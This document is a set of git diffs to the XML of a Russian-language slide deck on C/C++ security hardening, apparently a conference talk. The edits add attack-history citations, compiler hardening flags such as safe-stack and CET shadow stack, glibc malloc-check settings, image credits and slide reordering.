+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (Solar Designer, 1997)</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
@@ -6044,7 +6047,31 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Return-oriented Programming</a:t>
+              <a:t>Return-oriented Programming (Nergal, 2001 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Shacham</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>200</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>7)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -6091,6 +6118,74 @@
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5907203C-7930-4B98-B51C-7530BB7BA762}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8875344" y="1502896"/>
+            <a:ext cx="2841526" cy="4262290"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="TextBox 5">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{333D0371-EB56-4B28-A2BA-F24A998EABC4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8964705" y="5765186"/>
+            <a:ext cx="2752165" cy="461665"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>https://www.rawpixel.com/image/5958324/free-public-domain-cc0-photo</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -12854,6 +12949,80 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3668D197-0143-45DE-9E8E-1D1C07529EFE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8346141" y="415738"/>
+            <a:ext cx="3521868" cy="2347912"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="TextBox 5">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC52FB89-EDB1-476D-9BAF-D4214700D336}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8640715" y="2754182"/>
+            <a:ext cx="3227294" cy="461665"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>https://kingsvilletimes.ca/2022/10/common-sense-health-rake-up-the-leaves-this-fall/</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -20038,7 +20207,36 @@
               </a:rPr>
               <a:t> CWE Top 25 2024</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (8 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>рейтинге </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>2019 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>года</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:r>
@@ -20066,19 +20264,19 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
+                <a:hlinkClick r:id="rId4"/>
               </a:rPr>
               <a:t>patch for -</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId3"/>
+                <a:hlinkClick r:id="rId4"/>
               </a:rPr>
               <a:t>ftrapv</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
+                <a:hlinkClick r:id="rId4"/>
               </a:rPr>
               <a:t> option.</a:t>
             </a:r>
@@ -20095,7 +20293,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
+                <a:hlinkClick r:id="rId5"/>
               </a:rPr>
               <a:t>BZ #35412</a:t>
             </a:r>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -22574,7 +22574,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -22631,6 +22631,24 @@
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Опции для защиты от аппаратных атак </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Spectre</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, etc.)</a:t>
             </a:r>
           </a:p>
           <a:p>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -333,7 +333,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/11/2025</a:t>
+              <a:t>7/12/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -531,7 +531,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/11/2025</a:t>
+              <a:t>7/12/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -739,7 +739,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/11/2025</a:t>
+              <a:t>7/12/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -937,7 +937,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/11/2025</a:t>
+              <a:t>7/12/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1212,7 +1212,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/11/2025</a:t>
+              <a:t>7/12/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1477,7 +1477,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/11/2025</a:t>
+              <a:t>7/12/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1889,7 +1889,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/11/2025</a:t>
+              <a:t>7/12/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2030,7 +2030,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/11/2025</a:t>
+              <a:t>7/12/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2143,7 +2143,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/11/2025</a:t>
+              <a:t>7/12/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2454,7 +2454,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/11/2025</a:t>
+              <a:t>7/12/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2742,7 +2742,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/11/2025</a:t>
+              <a:t>7/12/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2983,7 +2983,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/11/2025</a:t>
+              <a:t>7/12/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -7563,7 +7563,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>пакеты </a:t>
+              <a:t>Пакеты </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -7590,7 +7590,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>пакеты </a:t>
+              <a:t>Статус на </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -7598,7 +7598,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>видимо собираются пока без этого флага (</a:t>
+              <a:t>неясен (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
@@ -7616,7 +7616,15 @@
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не защищены даже уязвимые программы: </a:t>
+              <a:t>На </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian 12 (stable) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не защищены даже уязвимые программы: </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -5495,7 +5495,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -5603,6 +5603,17 @@
               <a:t>Не защищает от переписывания пользовательских указателей на функции на стеке</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не защащиет от переписывания адреса возврата без </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>overflow</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -4085,7 +4085,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Можно проверить программой </a:t>
+              <a:t>Можно проверить наличие программой </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -6359,7 +6359,12 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="838200" y="1825625"/>
+            <a:ext cx="9668435" cy="4351338"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr>
             <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
@@ -6484,6 +6489,83 @@
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>StackProtector по прежнему применяется для unsafe stack для обнаружения overflow</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D28D487-2651-45C6-9D0B-EFDDEA26E36D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="10075768" y="365125"/>
+            <a:ext cx="1847850" cy="2466975"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="TextBox 5">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4812181A-063B-4CE3-BAAF-71CB652D19C2}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="10228168" y="2832100"/>
+            <a:ext cx="1847850" cy="646331"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>https://picryl.com/media/reaching-shadow-heart-nature-landscapes-d62bda</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6815,15 +6897,32 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>fsanitize</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>=safe-stack (</a:t>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=safe-stack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -6835,10 +6934,49 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Intel CET Shadow Stack: -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Intel CET Shadow Stack: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fcf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protection</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>или </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>mshstk</a:t>
             </a:r>
             <a:r>
@@ -16394,6 +16532,22 @@
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>наиболее опасная уязвимость)</a:t>
             </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не лучшая метрика (большая часть </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CVE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>это уязвимости веб-приложений)</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:r>
@@ -16522,6 +16676,42 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B53CDCD-FB7A-4AC6-9448-79BD075801FF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId6">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8924645" y="1123688"/>
+            <a:ext cx="3088061" cy="900374"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -15182,12 +15182,46 @@
               <a:t> </a:t>
             </a:r>
             <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>просто </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LD_PRELOAD=path/to/new/allocator.so</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверки в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Glibc </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>включаются по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>MALLOC_CHECK_=3 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>или </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GLIBC_TUNABLES=</a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>достаточно</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> LD_PRELOAD=path/to/new/allocator.so</a:t>
+              <a:t>glibc.malloc.check</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>=3</a:t>
             </a:r>
           </a:p>
           <a:p>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -18,68 +18,69 @@
     <p:sldId id="262" r:id="rId12"/>
     <p:sldId id="266" r:id="rId13"/>
     <p:sldId id="267" r:id="rId14"/>
-    <p:sldId id="268" r:id="rId15"/>
-    <p:sldId id="282" r:id="rId16"/>
-    <p:sldId id="269" r:id="rId17"/>
-    <p:sldId id="273" r:id="rId18"/>
-    <p:sldId id="272" r:id="rId19"/>
-    <p:sldId id="274" r:id="rId20"/>
-    <p:sldId id="284" r:id="rId21"/>
-    <p:sldId id="277" r:id="rId22"/>
-    <p:sldId id="285" r:id="rId23"/>
-    <p:sldId id="286" r:id="rId24"/>
-    <p:sldId id="283" r:id="rId25"/>
-    <p:sldId id="275" r:id="rId26"/>
-    <p:sldId id="276" r:id="rId27"/>
-    <p:sldId id="278" r:id="rId28"/>
-    <p:sldId id="287" r:id="rId29"/>
-    <p:sldId id="288" r:id="rId30"/>
-    <p:sldId id="291" r:id="rId31"/>
-    <p:sldId id="289" r:id="rId32"/>
-    <p:sldId id="290" r:id="rId33"/>
-    <p:sldId id="292" r:id="rId34"/>
-    <p:sldId id="332" r:id="rId35"/>
-    <p:sldId id="293" r:id="rId36"/>
-    <p:sldId id="294" r:id="rId37"/>
-    <p:sldId id="295" r:id="rId38"/>
-    <p:sldId id="296" r:id="rId39"/>
-    <p:sldId id="297" r:id="rId40"/>
-    <p:sldId id="298" r:id="rId41"/>
-    <p:sldId id="300" r:id="rId42"/>
-    <p:sldId id="301" r:id="rId43"/>
-    <p:sldId id="302" r:id="rId44"/>
-    <p:sldId id="299" r:id="rId45"/>
-    <p:sldId id="303" r:id="rId46"/>
-    <p:sldId id="304" r:id="rId47"/>
-    <p:sldId id="305" r:id="rId48"/>
-    <p:sldId id="306" r:id="rId49"/>
-    <p:sldId id="307" r:id="rId50"/>
-    <p:sldId id="308" r:id="rId51"/>
-    <p:sldId id="309" r:id="rId52"/>
-    <p:sldId id="310" r:id="rId53"/>
-    <p:sldId id="311" r:id="rId54"/>
-    <p:sldId id="312" r:id="rId55"/>
-    <p:sldId id="313" r:id="rId56"/>
-    <p:sldId id="314" r:id="rId57"/>
-    <p:sldId id="315" r:id="rId58"/>
-    <p:sldId id="316" r:id="rId59"/>
-    <p:sldId id="317" r:id="rId60"/>
-    <p:sldId id="318" r:id="rId61"/>
-    <p:sldId id="319" r:id="rId62"/>
-    <p:sldId id="320" r:id="rId63"/>
-    <p:sldId id="321" r:id="rId64"/>
-    <p:sldId id="322" r:id="rId65"/>
-    <p:sldId id="323" r:id="rId66"/>
-    <p:sldId id="324" r:id="rId67"/>
-    <p:sldId id="325" r:id="rId68"/>
-    <p:sldId id="326" r:id="rId69"/>
-    <p:sldId id="327" r:id="rId70"/>
-    <p:sldId id="328" r:id="rId71"/>
-    <p:sldId id="329" r:id="rId72"/>
-    <p:sldId id="330" r:id="rId73"/>
-    <p:sldId id="331" r:id="rId74"/>
-    <p:sldId id="271" r:id="rId75"/>
-    <p:sldId id="270" r:id="rId76"/>
+    <p:sldId id="333" r:id="rId15"/>
